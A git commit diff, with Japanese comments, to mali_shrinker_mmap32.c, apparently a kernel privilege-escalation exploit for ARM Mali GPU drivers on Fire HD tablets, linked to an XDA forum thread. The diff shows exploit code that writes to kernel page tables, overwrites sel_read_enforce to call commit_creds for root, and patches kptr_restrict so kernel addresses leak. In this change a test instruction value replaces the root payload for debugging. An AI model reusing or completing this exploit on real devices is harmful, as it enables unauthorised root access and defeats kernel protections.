write_data関数を追加しstack_errorが発生するか検証

https://xdaforums.com/t/potential-arm-mali-gpu-based-root-firehd-8th-12th-gen-affected.4574635/post-89499547

Signed-off-by: yuu <[email protected]>

mali_shrinker_mmap32.c

@@ -706,7 +706,9 @@ void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
   //Call commit_creds to overwrite process credentials to gain root
-  write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+  //write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));// 検証のためコメントアウト
+  //stack_errorが発生するか検証
+    write_data(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, stack_error, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
 
 void spray(int mali_fd) {
@@ -731,7 +733,11 @@ void spray(int mali_fd) {
     }
 
 }
+//kallsymsがアドレスを吐くようにする
 static uint64_t kptr_restrict = 0x1147178;
+//検証用
+static uint32_t stack_error = 0x14000021;
+
 void write_kptr_restrict(int mali_fd, int mali_fd2, uint64_t pgd,
                    uint64_t* reserved) {
   uint64_t kptr_restrict_addr =